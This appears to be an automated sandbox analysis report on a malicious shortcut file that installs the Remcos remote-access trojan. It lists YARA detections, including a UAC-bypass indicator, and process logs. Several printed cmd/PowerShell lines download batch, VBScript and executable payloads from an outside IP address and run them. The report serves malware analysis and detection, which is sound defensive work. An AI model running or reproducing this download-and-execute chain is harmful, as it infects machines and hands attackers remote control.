Source: C:\Users\user\AppData\Local\Temp\qapuwvr, type: DROPPED Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: C:\Users\user\AppData\Local\Temp\qapuwvr, type: DROPPED Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: C:\Users\user\AppData\Local\Temp\gps, type: DROPPED Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\gps, type: DROPPED Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: C:\Users\user\AppData\Local\Temp\gps, type: DROPPED Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: C:\Users\user\AppData\Local\Temp\demhwk, type: DROPPED Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\demhwk, type: DROPPED Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: C:\Users\user\AppData\Local\Temp\demhwk, type: DROPPED Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: classification engine Classification label: mal100.troj.expl.evad.winLNK@44/34@0/2
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Code function: 16_2_00407776 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree, 16_2_00407776
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Code function: 16_2_0040118A GetDiskFreeSpaceExW,SendMessageW, 16_2_0040118A
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Code function: 16_2_004034C1 _wtol,_wtol,SHGetSpecialFolderPathW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,CoCreateInstance,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z, 16_2_004034C1
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Code function: 16_2_00401BDF GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,wsprintfW,LoadLibraryA,GetProcAddress, 16_2_00401BDF
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\hello.bat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2432:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:420:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4780:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:364:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1052:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jdnnkvff.gsl.ps1
Source: Yara match File source: 17.0.DZIPR.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000000.2322852163.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.2318798588.00000000027E3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\DZIPR.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe, type: DROPPED
Source: unknown Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat && C:\Users\user\AppData\Roaming/hello.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/hi.vbs -OutFile C:\Users\user\AppData\Roaming/hi.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\System32\conhost.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: Dlr7HYI6VL.lnk ReversingLabs: Detection: 15%
Source: unknown Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat && C:\Users\user\AppData\Roaming/hello.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/hi.vbs -OutFile C:\Users\user\AppData\Roaming/hi.vbs
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c C:\Users\user\AppData\Roaming/hi.vbs
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hi.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ffo.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/AUGUST.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\AUGUST.exe C:\Users\user\AppData\Roaming/AUGUST.exe
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Process created: C:\Users\user\DZIPR.exe "C:\Users\user\DZIPR.exe"
Source: C:\Users\user\DZIPR.exe Process created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown Process created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe "C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe"
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/hi.vbs -OutFile C:\Users\user\AppData\Roaming/hi.vbs
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c C:\Users\user\AppData\Roaming/hi.vbs
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hi.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ffo.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/AUGUST.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\AUGUST.exe C:\Users\user\AppData\Roaming/AUGUST.exe
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Process created: C:\Users\user\DZIPR.exe "C:\Users\user\DZIPR.exe"
Source: C:\Users\user\DZIPR.exe Process created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\cmd.exe Section loaded: wldp.dll
Source: C:\Windows\System32\cmd.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\cmd.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\cmd.exe Section loaded: propsys.dll
Source: C:\Windows\System32\cmd.exe Section loaded: profapi.dll
Source: C:\Windows\System32\cmd.exe Section loaded: edputil.dll
Source: C:\Windows\System32\cmd.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\cmd.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\cmd.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\cmd.exe Section loaded: netutils.dll
Source: C:\Windows\System32\cmd.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\cmd.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\cmd.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\cmd.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\cmd.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\cmd.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\cmd.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\cmd.exe Section loaded: slc.dll
Source: C:\Windows\System32\cmd.exe Section loaded: userenv.dll
Source: C:\Windows\System32\cmd.exe Section loaded: sppc.dll
Source: C:\Windows\System32\cmd.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\cmd.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe Section loaded: pcacli.dll
Source: C:\Windows\System32\cmd.exe Section loaded: mpr.dll
Source: C:\Windows\System32\cmd.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: dlnashext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wpdshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll
